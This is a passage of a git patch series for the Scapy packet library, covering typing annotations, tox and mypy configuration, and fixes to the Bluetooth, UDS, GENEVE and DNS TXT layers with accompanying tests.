Union['ASN1_Packet', Type[ASN1F_field[Any, Any]], 'ASN1F_PACKET'] class ASN1F_SEQUENCE_OF(ASN1F_field[List[_SEQ_T], @@ -656,7 +656,7 @@ def i2repr(self, pkt, x): return self._field.i2repr(pkt, x) -_CHOICE_T = Union['ASN1_Packet', Type[ASN1F_field], 'ASN1F_PACKET'] +_CHOICE_T = Union['ASN1_Packet', Type[ASN1F_field[Any, Any]], 'ASN1F_PACKET'] class ASN1F_CHOICE(ASN1F_field[_CHOICE_T, ASN1_Object[Any]]): diff --git a/scapy/compat.py b/scapy/compat.py index 2906022a3ed..e3e2c2875a1 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -26,6 +26,7 @@ # typing 'DecoratorCallable', 'Literal', + 'Protocol', 'Self', 'UserDict', # compat @@ -45,7 +46,7 @@ # Note: # supporting typing on multiple python versions is a nightmare. # we provide a FakeType class to be able to use types added on -# later Python versions (since we run mypy on 3.11), on older +# later Python versions (since we run mypy on 3.12), on older # ones. @@ -77,9 +78,13 @@ def __repr__(self): # Python 3.8 Only if sys.version_info >= (3, 8): from typing import Literal + from typing import Protocol else: Literal = _FakeType("Literal") + class Protocol: + pass + # Python 3.9 Only if sys.version_info >= (3, 9): diff --git a/scapy/config.py b/scapy/config.py index 7b03d9debfe..bc01f1019d6 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -23,7 +23,7 @@ from scapy.base_classes import BasePacket from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS from scapy.error import log_scapy, warning, ScapyInvalidPlatformException -from scapy.themes import NoTheme, apply_ipython_style +from scapy.themes import ColorTheme, NoTheme, apply_ipython_style # Typing imports from typing import ( @@ -135,20 +135,20 @@ def _readonly(name): class ProgPath(ConfClass): - _default = "" - universal_open = "open" if DARWIN else "xdg-open" - pdfreader = universal_open - psreader = universal_open - svgreader = universal_open - dot = "dot" - display = "display" - tcpdump = "tcpdump" - tcpreplay = "tcpreplay" - hexedit = "hexer" - tshark = "tshark" - wireshark = "wireshark" - ifconfig = "ifconfig" - extcap_folders = [ + _default: str = "" + universal_open: str = "open" if DARWIN else "xdg-open" + pdfreader: str = universal_open + psreader: str = universal_open + svgreader: str = universal_open + dot: str = "dot" + display: str = "display" + tcpdump: str = "tcpdump" + tcpreplay: str = "tcpreplay" + hexedit: str = "hexer" + tshark: str = "tshark" + wireshark: str = "wireshark" + ifconfig: str = "ifconfig" + extcap_folders: List[str] = [ os.path.join(os.path.expanduser("~"), ".config", "wireshark", "extcap"), "/usr/lib/x86_64-linux-gnu/wireshark/extcap", ] @@ -389,7 +389,7 @@ def __setitem__(self, item, v): self._timetable[item] = time.time() super(CacheInstance, self).__setitem__(item, v) - def update(self, # type: ignore + def update(self, other, # type: Any **kwargs # type: Any ): @@ -404,7 +404,7 @@ def update(self, # type: ignore def iteritems(self): # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return super(CacheInstance, self).items() # type: ignore + return super(CacheInstance, self).items() t0 = time.time() return ( (k, v) @@ -415,7 +415,7 @@ def iteritems(self): def iterkeys(self): # type: () -> Iterator[str] if self.timeout is None: - return super(CacheInstance, self).keys() # type: ignore + return super(CacheInstance, self).keys() t0 = time.time() return ( k @@ -430,7 +430,7 @@ def __iter__(self): def itervalues(self): # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return super(CacheInstance, self).values() # type: ignore + return super(CacheInstance, self).values() t0 = time.time() return ( v @@ -616,7 +616,7 @@ def _set_conf_sockets(): Interceptor.set_from_hook(conf, "use_pcap", False) else: conf.L3socket = L3pcapSocket - conf.L3socket6 = functools.partial( # type: ignore + conf.L3socket6 = functools.partial( L3pcapSocket, filter="ip6") conf.L2socket = L2pcapSocket conf.L2listen = L2pcapListenSocket @@ -624,7 +624,7 @@ def _set_conf_sockets(): from scapy.arch.bpf.supersocket import L2bpfListenSocket, \ L2bpfSocket, L3bpfSocket conf.L3socket = L3bpfSocket - conf.L3socket6 = functools.partial( # type: ignore + conf.L3socket6 = functools.partial( L3bpfSocket, filter="ip6") conf.L2socket = L2bpfSocket conf.L2listen = L2bpfListenSocket @@ -698,7 +698,7 @@ def _iface_changer(attr, val, old): "See conf.ifaces output" ) return iface - return val # type: ignore + return val def _reset_tls_nss_keys(attr, val, old): @@ -712,8 +712,8 @@ class Conf(ConfClass): """ This object contains the configuration of Scapy. """ - version = ReadOnlyAttribute("version", VERSION) - session = "" #: filename where the session will be saved + version: str = ReadOnlyAttribute("version", VERSION) + session: str = "" #: filename where the session will be saved interactive = False #: can be "ipython", "bpython", "ptpython", "ptipython", "python" or "auto". #: Default: Auto @@ -723,15 +723,15 @@ class Conf(ConfClass): #: if 1, prevents any unwanted packet to go out (ARP, DNS, ...) stealth = "not implemented" #: selects the default output interface for srp() and sendp(). - iface = Interceptor("iface", None, _iface_changer) # type: 'scapy.interfaces.NetworkInterface' # type: ignore # noqa: E501 - layers = LayersList() + iface = Interceptor("iface", None, _iface_changer) # type: 'scapy.interfaces.NetworkInterface' # noqa: E501 + layers: LayersList = LayersList() commands = CommandsList() # type: CommandsList #: Codec used by default for ASN1 objects ASN1_default_codec = None # type: 'scapy.asn1.asn1.ASN1Codec' #: choose the AS resolver class to use AS_resolver = None # type: scapy.as_resolvers.AS_resolver dot15d4_protocol = None # Used in dot15d4.py - logLevel = Interceptor("logLevel", log_scapy.level, _loglevel_changer) + logLevel: int = Interceptor("logLevel", log_scapy.level, _loglevel_changer) #: if 0, doesn't check that IPID matches between IP sent and #: ICMP IP citation received #: if 1, checks that they either are equal or byte swapped @@ -749,7 +749,7 @@ class Conf(ConfClass): #: ones in ICMP citation check_TCPerror_seqack = False verb = 2 #: level of verbosity, from 0 (almost mute) to 3 (verbose) - prompt = Interceptor("prompt", ">>> ", _prompt_changer) + prompt: str = Interceptor("prompt", ">>> ", _prompt_changer) #: default mode for the promiscuous mode of a socket (to get answers if you #: spoof on a lan) sniff_promisc = True # type: bool @@ -757,8 +757,8 @@ class Conf(ConfClass): raw_summary = False # type: Union[bool, Callable[[bytes], Any]] padding_layer = None # type: Type[Packet] default_l2 = None # type: Type[Packet] - l2types = Num2Layer() - l3types = Num2Layer() + l2types: Num2Layer = Num2Layer() + l3types: Num2Layer = Num2Layer() L3socket = None # type: Type[scapy.supersocket.SuperSocket] L3socket6 = None # type: Type[scapy.supersocket.SuperSocket] L2socket = None # type: Type[scapy.supersocket.SuperSocket] @@ -769,10 +769,13 @@ class Conf(ConfClass): mib = None # type: 'scapy.asn1.mib.MIBDict' bufsize = 2**16 #: history file - histfile = os.getenv('SCAPY_HISTFILE', - os.path.join(os.path.expanduser("~"), - ".config", "scapy", - "history")) + histfile: str = os.getenv( + 'SCAPY_HISTFILE', + os.path.join( + os.path.expanduser("~"), + ".config", "scapy", "history" + ) + ) #: includes padding in disassembled packets padding = 1 #: BPF filter for packets to ignore @@ -808,36 +811,36 @@ class Conf(ConfClass): auto_fragment = True #: raise exception when a packet dissector raises an exception debug_dissector = False - color_theme = Interceptor("color_theme", NoTheme(), _prompt_changer) + color_theme: ColorTheme = Interceptor("color_theme", NoTheme(), _prompt_changer) #: how much time between warnings from the same place warning_threshold = 5 - prog = ProgPath() + prog: ProgPath = ProgPath() #: holds list of fields for which resolution should be done - resolve = Resolve() + resolve: Resolve = Resolve() #: holds list of enum fields for which conversion to string #: should NOT be done - noenum = Resolve() - emph = Emphasize() + noenum: Resolve = Resolve() + emph: Emphasize = Emphasize() #: read only attribute to show if PyPy is in use - use_pypy = ReadOnlyAttribute("use_pypy", isPyPy()) + use_pypy: bool = ReadOnlyAttribute("use_pypy", isPyPy()) #: use libpcap integration or not. Changing this value will update #: the conf.L[2/3] sockets - use_pcap = Interceptor( + use_pcap: bool = Interceptor( "use_pcap", os.getenv("SCAPY_USE_LIBPCAP", "").lower().startswith("y"), _socket_changer ) - use_bpf = Interceptor("use_bpf", False, _socket_changer) + use_bpf: bool = Interceptor("use_bpf", False, _socket_changer) use_npcap = False - ipv6_enabled = socket.has_ipv6 + ipv6_enabled: bool = socket.has_ipv6 stats_classic_protocols = [] # type: List[Type[Packet]] stats_dot11_protocols = [] # type: List[Type[Packet]] temp_files = [] # type: List[str] #: netcache holds time-based caches for net operations - netcache = NetCache() + netcache: NetCache = NetCache() geoip_city = None # can, tls, http and a few others are not loaded by default - load_layers = [ + load_layers: List[str] = [ 'bluetooth', 'bluetooth4LE', 'dcerpc', @@ -903,7 +906,7 @@ class Conf(ConfClass): #: When True, raise exception if no dst MAC found otherwise broadcast. #: Default is False. raise_no_dst_mac = False - loopback_name = "lo" if LINUX else "lo0" + loopback_name: str = "lo" if LINUX else "lo0" nmap_base = "" # type: str nmap_kdb = None # type: Optional[NmapKnowledgeBase] #: a safety mechanism: the maximum amount of items included in a PacketListField @@ -918,7 +921,7 @@ class Conf(ConfClass): _reset_tls_nss_keys ) #: Dictionary containing parsed NSS Keys - tls_nss_keys = None + tls_nss_keys: Dict[str, bytes] = None def __getattribute__(self, attr): # type: (str) -> Any @@ -971,7 +974,7 @@ def func_in(*args, **kwargs): raise ImportError("Cannot execute crypto-related method! " "Please install python-cryptography v1.7 or later.") # noqa: E501 return func(*args, **kwargs) - return func_in # type: ignore + return func_in def scapy_delete_temp_files(): diff --git a/scapy/packet.py b/scapy/packet.py index a4b94491d14..e66e7a1bf16 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1267,7 +1267,7 @@ def haslayer(self, cls, _subclass=None): if _subclass: match = issubtype else: - match = lambda cls1, cls2: bool(cls1 == cls2) + match = lambda x, t: bool(x == t) if cls is None or match(self.__class__, cls) \ or cls in [self.__class__.__name__, self._name]: return True @@ -1300,7 +1300,7 @@ def getlayer(self, if _subclass: match = issubtype else: - match = lambda cls1, cls2: bool(cls1 == cls2) + match = lambda x, t: bool(x == t) # Note: # cls can be int, packet, str # string_class_name can be packet, str (packet or packet+field) @@ -1422,8 +1422,8 @@ def _show_or_dump(self, """ if dump: - from scapy.themes import AnsiColorTheme - ct = AnsiColorTheme() # No color for dump output + from scapy.themes import ColorTheme, AnsiColorTheme + ct: ColorTheme = AnsiColorTheme() # No color for dump output else: ct = conf.color_theme s = "%s%s %s %s \n" % (label_lvl, @@ -2121,7 +2121,7 @@ def explore(layer=None): # Check for prompt_toolkit >= 3.0.0 call_ptk = lambda x: cast(str, x) # type: Callable[[Any], str] if _version_checker(prompt_toolkit, (3, 0)): - call_ptk = lambda x: x.run() # type: ignore + call_ptk = lambda x: x.run() # 1 - Ask for layer or contrib btn_diag = button_dialog( title="Scapy v%s" % conf.version, diff --git a/scapy/plist.py b/scapy/plist.py index e888e5662f3..daaccd3f419 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -379,7 +379,7 @@ def multiplot(self, kargs = MATPLOTLIB_DEFAULT_PLOT_KARGS if plot_xy: - lines = [plt.plot(*list(zip(*pl)), **dict(kargs, label=k)) # type: ignore + lines = [plt.plot(*list(zip(*pl)), **dict(kargs, label=k)) for k, pl in d.items()] else: lines = [plt.plot(pl, **dict(kargs, label=k)) diff --git a/scapy/themes.py b/scapy/themes.py index 528b6584fec..a30c179a2c2 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -16,11 +16,12 @@ from typing import ( Any, - Callable, List, Optional, Tuple, + cast, ) +from scapy.compat import Protocol class ColorTable: @@ -75,14 +76,27 @@ def ansi_to_pygments(self, x): Color = ColorTable() +class _ColorFormatterType(Protocol): + def __call__(self, + val: Any, + fmt: Optional[str] = None, + fmt2: str = "", + before: str = "", + after: str = "") -> str: + pass + + def create_styler(fmt=None, # type: Optional[str] before="", # type: str after="", # type: str fmt2="%s" # type: str ): - # type: (...) -> Callable[[Any], str] - def do_style(val, fmt=fmt, fmt2=fmt2, before=before, after=after): - # type: (Any, Optional[str], str, str, str) -> str + # type: (...) -> _ColorFormatterType + def do_style(val: Any, + fmt: Optional[str] = fmt, + fmt2: str = fmt2, + before: str = before, + after: str = after) -> str: if fmt is None: sval = str(val) else: @@ -92,6 +106,30 @@ def do_style(val, fmt=fmt, fmt2=fmt2, before=before, after=after): class ColorTheme: + style_normal = "" + style_prompt = "" + style_punct = "" + style_id = "" + style_not_printable = "" + style_layer_name = "" + style_field_name = "" + style_field_value = "" + style_emph_field_name = "" + style_emph_field_value = "" + style_packetlist_name = "" + style_packetlist_proto = "" + style_packetlist_value = "" + style_fail = "" + style_success = "" + style_odd = "" + style_even = "" + style_opening = "" + style_active = "" + style_closed = "" + style_left = "" + style_right = "" + style_logo = "" + def __repr__(self): # type: () -> str return "<%s>" % self.__class__.__name__ @@ -101,7 +139,7 @@ def __reduce__(self): return (self.__class__, (), ()) def __getattr__(self, attr): - # type: (str) -> Callable[[Any], str] + # type: (str) -> _ColorFormatterType if attr in ["__getstate__", "__setstate__", "__getinitargs__", "__reduce_ex__"]: raise AttributeError() @@ -120,7 +158,7 @@ class NoTheme(ColorTheme): class AnsiColorTheme(ColorTheme): def __getattr__(self, attr): - # type: (str) -> Callable[[Any], str] + # type: (str) -> _ColorFormatterType if attr.startswith("__"): raise AttributeError(attr) s = "style_%s" % attr @@ -135,30 +173,6 @@ def __getattr__(self, attr): return create_styler(before=before, after=after) - style_normal = "" - style_prompt = "" - style_punct = "" - style_id = "" - style_not_printable = "" - style_layer_name = "" - style_field_name = "" - style_field_value = "" - style_emph_field_name = "" - style_emph_field_value = "" - style_packetlist_name = "" - style_packetlist_proto = "" - style_packetlist_value = "" - style_fail = "" - style_success = "" - style_odd = "" - style_even = "" - style_opening = "" - style_active = "" - style_closed = "" - style_left = "" - style_right = "" - style_logo = "" - class BlackAndWhite(AnsiColorTheme, NoTheme): pass @@ -262,8 +276,7 @@ class ColorOnBlackTheme(AnsiColorTheme): class FormatTheme(ColorTheme): - def __getattr__(self, attr): - # type: (str) -> Callable[[Any], str] + def __getattr__(self, attr: str) -> _ColorFormatterType: if attr.startswith("__"): raise AttributeError(attr) colfmt = self.__class__.__dict__.get("style_%s" % attr, "%s") @@ -293,10 +306,13 @@ class LatexTheme(FormatTheme): # style_odd = "" style_logo = r"\textcolor{green}{\bf %s}" - def __getattr__(self, attr: str) -> Callable[[Any], str]: + def __getattr__(self, attr: str) -> _ColorFormatterType: from scapy.utils import tex_escape styler = super(LatexTheme, self).__getattr__(attr) - return lambda x: styler(tex_escape(x)) + return cast( + _ColorFormatterType, + lambda x, *args, **kwargs: styler(tex_escape(x), *args, **kwargs), + ) class LatexTheme2(FormatTheme): diff --git a/scapy/utils.py b/scapy/utils.py index 2fd4d0c89ca..1906390f18c 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -440,9 +440,11 @@ def hexdiff(a, b, autojunk=False): # Print the diff x = y = i = 0 - colorize = {0: lambda x: x, - -1: conf.color_theme.left, - 1: conf.color_theme.right} + colorize: Dict[int, Callable[[str], str]] = { + 0: lambda x: x, + -1: conf.color_theme.left, + 1: conf.color_theme.right + } dox = 1 doy = 0 @@ -1476,12 +1478,17 @@ def __init__(self, filename, fdesc=None, magic=None): # type: ignore self.default_options = { "tsresol": 1000000 } - self.blocktypes = { - 1: self._read_block_idb, - 2: self._read_block_pkt, - 3: self._read_block_spb, - 6: self._read_block_epb, - 10: self._read_block_dsb, + self.blocktypes: Dict[ + int, + Callable[ + [bytes, int], + Optional[Tuple[bytes, RawPcapNgReader.PacketMetadata]] + ]] = { + 1: self._read_block_idb, + 2: self._read_block_pkt, + 3: self._read_block_spb, + 6: self._read_block_epb, + 10: self._read_block_dsb, } self.endian = "!" # Will be overwritten by first SHB @@ -1516,10 +1523,9 @@ def _read_block(self, size=MTU): raise EOFError block = self.f.read(blocklen - 12) self._read_block_tail(blocklen) - return self.blocktypes.get( - blocktype, - lambda block, size: None - )(block, size) + if blocktype in self.blocktypes: + return self.blocktypes[blocktype](block, size) + return None def _read_block_tail(self, blocklen): # type: (int) -> None @@ -1598,10 +1604,10 @@ def _read_block_idb(self, block, _): # 4 bytes Snaplen options = self._read_options(block[8:-4]) try: - interface = struct.unpack( # type: ignore + interface: Tuple[int, int, int] = struct.unpack( self.endian + "HxxI", block[:8] - ) + (options["tsresol"],) # type: Tuple[int, int, int] + ) + (options["tsresol"],) except struct.error: warning("PcapNg: IDB is too small %d/8 !" % len(block)) raise EOFError diff --git a/tox.ini b/tox.ini index ebd54457f1b..dd282e510f2 100644 --- a/tox.ini +++ b/tox.ini @@ -2,11 +2,15 @@ # Copyright (C) 2020 Guillaume Valadon +# Tox environments: +# py{version}-{os}-{non_root,root} +# In our testing, version can be 37 to 312 or py39 for pypy39 + [tox] -envlist = py{27,34,35,36,37,38,39,310,311,py27,py39}-{linux,bsd}_{non_root,root}, - py{27,34,35,36,37,38,39,310,311,py27,py39}-windows, +# minversion = 4.0 skip_missing_interpreters = true -minversion = 4.0 +# envlist = default when doing 'tox' +envlist = py{37,38,39,310,311,312}-{linux,bsd,windows}-non_root # Main tests @@ -36,14 +40,14 @@ deps = mock brotli < 1.1.0 ; sys_platform != 'win32' zstandard ; sys_platform != 'win32' platform = - linux_non_root,linux_root: linux - bsd_non_root,bsd_root: darwin|freebsd|openbsd|netbsd + linux: linux + bsd: darwin|freebsd|openbsd|netbsd windows: win32 commands = - linux_non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -N {posargs} - linux_root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} - bsd_non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} - bsd_root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} + linux-non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -N {posargs} + linux-root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} + bsd-non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} + bsd-root: sudo -E {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} windows: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc {posargs} {env:DISABLE_COVERAGE:coverage combine} {env:DISABLE_COVERAGE:coverage xml -i} @@ -99,7 +103,7 @@ commands = [testenv:mypy] description = "Check Scapy compliance against static typing" skip_install = true -deps = mypy==1.1.1 +deps = mypy==1.7.0 typing types-mock commands = python .config/mypy/mypy_check.py linux @@ -108,10 +112,9 @@ commands = python .config/mypy/mypy_check.py linux [testenv:docs] description = "Build the docs" -skip_install = true +deps = +extras = doc changedir = {toxinidir}/doc/scapy -deps = sphinx>=2.4.2 - sphinx_rtd_theme commands = sphinx-build -W --keep-going -b html . _build/html From 7e19b7b99ebefdf4e0c89e71273f39c4bff51be5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 14 Nov 2023 21:13:00 +0100 Subject: [PATCH 1123/1632] README: new badge URL --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d71f4115759..8168cb94df6 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Scapy   Scapy -[![Scapy unit tests](https://github.com/secdev/scapy/workflows/Scapy%20unit%20tests/badge.svg?event=push)](https://github.com/secdev/scapy/actions?query=workflow%3A%22Scapy+unit+tests%22+branch%3Amaster+event%3Apush) +[![Scapy unit tests](https://github.com/secdev/scapy/actions/workflows/unittests.yml/badge.svg?branch=master&event=push)](https://github.com/secdev/scapy/actions/workflows/unittests.yml?query=event%3Apush) [![AppVeyor Build status](https://ci.appveyor.com/api/projects/status/os03daotfja0wtp7/branch/master?svg=true)](https://ci.appveyor.com/project/secdev/scapy/branch/master) [![Codecov Status](https://codecov.io/gh/secdev/scapy/branch/master/graph/badge.svg)](https://codecov.io/gh/secdev/scapy) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/30ee6772bb264a689a2604f5cdb0437b)](https://www.codacy.com/app/secdev/scapy) From adc6cb08b0a354f6bd7de4db4ac20b57c302949a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Antonio=20V=C3=A1zquez=20Blanco?= Date: Tue, 31 Oct 2023 12:25:00 +0100 Subject: [PATCH 1124/1632] Fix exception on failed _BluetoothLibcSockets --- scapy/layers/bluetooth.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index ba4528f9a7d..75b3b05ba79 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -2055,7 +2055,8 @@ def close(self): if hasattr(self, "ins"): if self.ins and (WINDOWS or self.ins.fileno() != -1): close(self.ins.fileno()) - close(self.hci_fd) + if hasattr(self, "hci_fd"): + close(self.hci_fd) class BluetoothUserSocket(_BluetoothLibcSocket): From 9676e957e2c29ab6322fc9dca5f2b97a6b8c949c Mon Sep 17 00:00:00 2001 From: Jose Luis Duran Date: Sun, 29 Oct 2023 06:59:55 +0000 Subject: [PATCH 1125/1632] packet: Remove trailing whitespace --- scapy/packet.py | 8 ++++---- test/regression.uts | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index e66e7a1bf16..6759dfc4c8c 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1426,10 +1426,10 @@ def _show_or_dump(self, ct: ColorTheme = AnsiColorTheme() # No color for dump output else: ct = conf.color_theme - s = "%s%s %s %s \n" % (label_lvl, - ct.punct("###["), - ct.layer_name(self.name), - ct.punct("]###")) + s = "%s%s %s %s\n" % (label_lvl, + ct.punct("###["), + ct.layer_name(self.name), + ct.punct("]###")) for f in self.fields_desc: if isinstance(f, ConditionalField) and not f._evalcond(self): continue diff --git a/test/regression.uts b/test/regression.uts index 7409ec29873..c73e3d27321 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -123,7 +123,7 @@ with ContextManagerCaptureOutput() as cmco: pkt.show() result = cmco.get_output().strip() -assert result == '\\#\\#\\#[ \\textcolor{red}{\\bf SmallPacket} ]\\#\\#\\# \n \\textcolor{blue}{a} = \\textcolor{purple}{0}' +assert result == '\\#\\#\\#[ \\textcolor{red}{\\bf SmallPacket} ]\\#\\#\\#\n \\textcolor{blue}{a} = \\textcolor{purple}{0}' conf.color_theme = conf_color_theme From 42bfd7ccea26acfde1e3d85bf5ad0819a452ee4f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 17 Nov 2023 20:42:24 +0100 Subject: [PATCH 1126/1632] Modify packet definition of UDS_IOCBI packet to allow customization (#4161) --- scapy/contrib/automotive/uds.py | 8 ++------ scapy/contrib/automotive/uds_scan.py | 2 +- test/contrib/automotive/uds.uts | 3 +-- 3 files changed, 4 insertions(+), 9 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index bbe0316144c..5d67394bc04 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -1374,11 +1374,8 @@ def answers(self, other): # #########################IOCBI################################### class UDS_IOCBI(Packet): name = 'InputOutputControlByIdentifier' - dataIdentifiers = ObservableDict() fields_desc = [ - XShortEnumField('dataIdentifier', 0, dataIdentifiers), - ByteField('controlOptionRecord', 0), - StrField('controlEnableMaskRecord', b"", fmt="B") + XShortEnumField('dataIdentifier', 0, UDS_RDBI.dataIdentifiers), ] @@ -1388,8 +1385,7 @@ class UDS_IOCBI(Packet): class UDS_IOCBIPR(Packet): name = 'InputOutputControlByIdentifierPositiveResponse' fields_desc = [ - XShortField('dataIdentifier', 0), - StrField('controlStatusRecord', b"", fmt="B") + XShortEnumField('dataIdentifier', 0, UDS_RDBI.dataIdentifiers), ] def answers(self, other): diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 8552a5d1af3..a23c7c6027d 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -873,7 +873,7 @@ def _get_table_entry_y(self, tup): if resp is not None: return "0x%04x: %s" % \ (tup[1].dataIdentifier, - resp.controlStatusRecord) + repr(resp.payload)) else: return "0x%04x: No response" % tup[1].dataIdentifier diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index ea3bb085530..8a05bf4ac34 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -1362,8 +1362,7 @@ assert rtepr.answers(rte) iocbi = UDS(b'\x2f\x23\x34\xffcoffee') assert iocbi.service == 0x2f assert iocbi.dataIdentifier == 0x2334 -assert iocbi.controlOptionRecord == 255 -assert iocbi.controlEnableMaskRecord == b'coffee' +assert iocbi.load == b'\xffcoffee' = Check UDS_RFT From 94bc3720927a5911bf16e3903f74baeb0f6e4dc8 Mon Sep 17 00:00:00 2001 From: hujingfei Date: Sat, 7 Oct 2023 11:00:56 +0800 Subject: [PATCH 1127/1632] Fix and add test for GENEVE.optionlen --- scapy/contrib/geneve.py | 2 +- test/contrib/geneve.uts | 6 ++++++ 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/geneve.py b/scapy/contrib/geneve.py index 77ce847a5ed..60430fee1f8 100644 --- a/scapy/contrib/geneve.py +++ b/scapy/contrib/geneve.py @@ -66,7 +66,7 @@ class GENEVE(Packet): def post_build(self, p, pay): if self.optionlen is None: tmp_len = (len(p) - 8) // 4 - p = chb(tmp_len & 0x2f | orb(p[0]) & 0xc0) + p[1:] + p = chb(tmp_len & 0x3f | orb(p[0]) & 0xc0) + p[1:] return p + pay def answers(self, other): diff --git a/test/contrib/geneve.uts b/test/contrib/geneve.uts index 5811f56741b..e40533b3558 100644 --- a/test/contrib/geneve.uts +++ b/test/contrib/geneve.uts @@ -66,3 +66,9 @@ a = GENEVE(proto=0x0800)/b'E\x00\x00\x1c\x00\x01\x00\x00@\x01\xfa$\xc0\xa8\x00w\ a = GENEVE(raw(a)) assert a.summary() == 'GENEVE / IP / ICMP 192.168.0.119 > 172.217.18.195 echo-request 0' assert a.mysummary() in ['GENEVE (vni=0x0,optionlen=0,proto=0x800)', 'GENEVE (vni=0x0,optionlen=0,proto=IPv4)'] + += GENEVE - Optionlen + +data = raw(RandString(size=random.randint(0, pow(2, 6)) * 4)) +p = GENEVE(raw(GENEVE(options=GeneveOptions(data=data)))) +assert p[GENEVE].optionlen == (len(data) // 4 + 1) From 81aa7fa918ee69750f7c6ef1aefae71e9310d8d8 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 17 Nov 2023 19:54:48 +0000 Subject: [PATCH 1128/1632] DNS: make it possible to include empty strings in TXT RDATA According to https://datatracker.ietf.org/doc/html/rfc1035#section-3.3.14 TXT RDATA holds one or more s where is a single length octet followed by that number of characters. This patch makes it possible to include empty strings (by appending zero-bytes showing that their length is zero). It also changes the default value to avoid generating TXT RRs with zero-length TXT RDATA by default. It's still possible to generate zero-length TXT RDATA by passing rdata=[] explicitly. --- scapy/layers/dns.py | 5 ++++- test/scapy/layers/dns.uts | 25 +++++++++++++++++++++++++ 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 606fde284f9..94cf6d78144 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -369,6 +369,9 @@ def i2len(self, pkt, x): def i2m(self, pkt, s): ret_s = b"" for text in s: + if not text: + ret_s += b"\x00" + continue text = bytes_encode(text) # The initial string must be split into a list of strings # prepended with theirs sizes. @@ -943,7 +946,7 @@ class DNSRR(Packet): length_from=lambda pkt: pkt.rdlen), lambda pkt: pkt.type in [2, 3, 4, 5, 12]), # TEXT - (DNSTextField("rdata", [], + (DNSTextField("rdata", [""], length_from=lambda pkt: pkt.rdlen), lambda pkt: pkt.type == 16), ], diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index a27bec3d91b..c0c1de8b016 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -213,6 +213,31 @@ p = DNS(raw(DNS(id=1,ra=1,qd=[],an=DNSRR(rrname='secdev', type='TXT', rdata=["sw assert p[DNS].an[0].rdata == [b"sweet", b"celestia"] assert raw(p) == b'\x00\x01\x01\x80\x00\x00\x00\x01\x00\x00\x00\x00\x06secdev\x00\x00\x10\x00\x01\x00\x00\x00\x01\x00\x0f\x05sweet\x08celestia' +# TXT RR with one empty string +b = b'\x05scapy\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x01\x00' +rr = DNSRR(b) +assert rr.rdata == [b""] +assert rr.rdlen == 1 +rr.clear_cache() +assert DNSRR(raw(rr)).rdata == [b""] + +rr = DNSRR(rrname='scapy', type='TXT', rdata=[""]) +assert raw(rr) == b + +rr = DNSRR(rrname='scapy', type='TXT') +assert raw(rr) == b + +# TXT RR with zero-length RDATA +b = b'\x05scapy\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00' +rr = DNSRR(b) +assert rr.rdata == [] +assert rr.rdlen == 0 +rr.clear_cache() +assert DNSRR(raw(rr)).rdata == [] + +rr = DNSRR(rrname='scapy', type='TXT', rdata=[]) +assert raw(rr) == b + = DNS - Malformed DNS over TCP message _old_dbg = conf.debug_dissector From 